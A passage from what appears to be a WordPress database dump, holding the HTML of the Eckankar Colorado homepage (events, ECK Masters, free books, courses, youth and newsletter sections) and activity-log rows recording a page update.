col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236873,40266,'_message_key','post_updated'),(236874,40266,'_user_id','2'),(236875,40266,'_user_login','S8zhaBda'),(236876,40266,'_user_email','nada@zipnadanot.org'),(236877,40266,'_server_remote_addr','76.130.120.x'),(236878,40266,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236879,40267,'post_id','7160'),(236880,40267,'post_type','page'),(236881,40267,'post_title','Home'),(236882,40267,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local 